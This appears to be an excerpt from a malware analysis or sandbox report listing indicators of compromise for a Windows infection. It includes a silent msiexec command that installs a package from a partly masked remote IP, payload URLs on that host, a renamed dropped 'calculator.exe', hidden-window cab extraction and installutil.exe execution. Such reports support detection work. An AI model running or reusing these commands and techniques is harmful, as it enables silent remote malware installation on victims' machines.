Technical Information
- '<SYSTEM32>\msiexec.exe' /i http://66.##6.40.103/file.msi /qn
- %WINDIR%\microsoft.net\framework\v4.0.30319\installutil.exe
- %TEMP%\mw-d6b64d8f-6b76-434e-983c-9f50ca50fc44\msiwrapper.ini
- %TEMP%\mw-d6b64d8f-6b76-434e-983c-9f50ca50fc44\files.cab
- %TEMP%\mw-d6b64d8f-6b76-434e-983c-9f50ca50fc44\files\$dpx$.tmp\a7b5dbb12e673745abe81d08e16db3bf.tmp
- from %TEMP%\mw-d6b64d8f-6b76-434e-983c-9f50ca50fc44\files\$dpx$.tmp\a7b5dbb12e673745abe81d08e16db3bf.tmp to %TEMP%\mw-d6b64d8f-6b76-434e-983c-9f50ca50fc44\files\calculator.exe
- http://66.##6.40.103/file.msi
- http://66.##6.40.103/bin.bin
- http://66.##6.40.103/info.php
- DNS ASK sp###.network
- '%TEMP%\mw-d6b64d8f-6b76-434e-983c-9f50ca50fc44\files\calculator.exe'
- '%WINDIR%\syswow64\expand.exe' -R files.cab -F:* files (with hidden window)
- '%WINDIR%\syswow64\expand.exe' -R files.cab -F:* files
- '%WINDIR%\microsoft.net\framework\v4.0.30319\installutil.exe'